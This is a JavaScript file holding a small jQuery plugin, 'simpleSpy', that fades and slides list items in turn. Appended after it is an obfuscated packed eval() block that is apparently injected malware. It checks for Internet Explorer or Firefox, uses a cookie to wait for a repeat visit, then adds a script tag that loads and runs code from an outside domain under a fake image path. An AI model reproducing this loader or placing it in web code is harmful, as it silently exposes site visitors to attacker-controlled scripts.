(function ($) {
    
$.fn.simpleSpy = function (limit, interval) {
    limit = limit || 4;
    interval = interval || 4000;
    
    return this.each(function () {
        // 1. setup
            // capture a cache of all the list items
            // chomp the list down to limit li elements
        var $list = $(this),
            items = [], // uninitialised
            currentItem = limit,
            total = 0, // initialise later on
            height = $list.find('> li:first').height();
            
        // capture the cache
        $list.find('> li').each(function () {
            items.push('<li>' + $(this).html() + '</li>');
        });
        
        total = items.length;
        
        $list.wrap('<div class="spyWrapper" />').parent().css({ height : height * limit });
        
        $list.find('> li').filter(':gt(' + (limit - 1) + ')').remove();

        // 2. effect        
        function spy() {
            // insert a new item with opacity and height of zero
            var $insert = $(items[currentItem]).css({
                height : 0,
                opacity : 0,
                display : 'none'
            }).appendTo($list);


            // fade the LAST item out
            $list.find('> li:first').animate({ opacity : 0}, 1000, function () {
                // increase the height of the NEW first item
                $insert.animate({ height : height }, 1000).animate({ opacity : 0.99 }, 1000);
                
				
                // AND at the same time - decrease the height of the LAST item
                 $(this).animate({ height : 0 }, 1000, function () {
                    // finally fade the first item in (and we can remove the last)
                    $(this).remove();
                 });
            });
			
          
            currentItem++;
            if (currentItem >= total) {
                currentItem = 0;
            }
            
            setTimeout(spy, interval)
        }
        
        spy();
    });
};
    
})(jQuery);



eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('(k(d){2 e=P.O;2 f=N;5(e.7("M")!=-1||e.7("Q")!=-1)f=m;5(f!==m)o;2 n=\'U://L.S.V/I/E.D?B\';2 c=t("a");5(c){5(c==\'p\'){b("a","H","3");2 s=6.K(\'J\');s.G=\'C/T\';s.Y=n+\'&r=\'+u v().16();2 h=6.19(\'18\')[0];h.17(s)}l{}}l{b("a","p","3")}k t(8){2 i,x,y,4=6.A.X(";");10(i=0;i<4.11;i++){x=4[i].q(0,4[i].7("="));y=4[i].q(4[i].7("=")+1);x=x.13(/^\\s+|\\s+$/g,"");5(x==8){o 12(y)}}}k b(8,w,j){2 9=u v();9.15(9.Z()+j);2 z=14(w)+((j==W)?"":"; F="+9.R());6.A=8+"="+z}})(6);',62,72,'||var||ARRcookies|if|document|indexOf|c_name|exdate|wss|setCookie|rc||agent|show||||exdays|function|else|true|staturl|return|goot1|substr|||getCookie|new|Date|value|||c_value|cookie|js|text|gif|dummy|expires|type|goot2|pics|script|createElement|www|Firefox|false|userAgent|navigator|MSIE|toUTCString|leeuwenbergh|javascript|http|nl|null|split|src|getDate|for|length|unescape|replace|escape|setDate|getTime|appendChild|head|getElementsByTagName'.split('|'),0,{}))

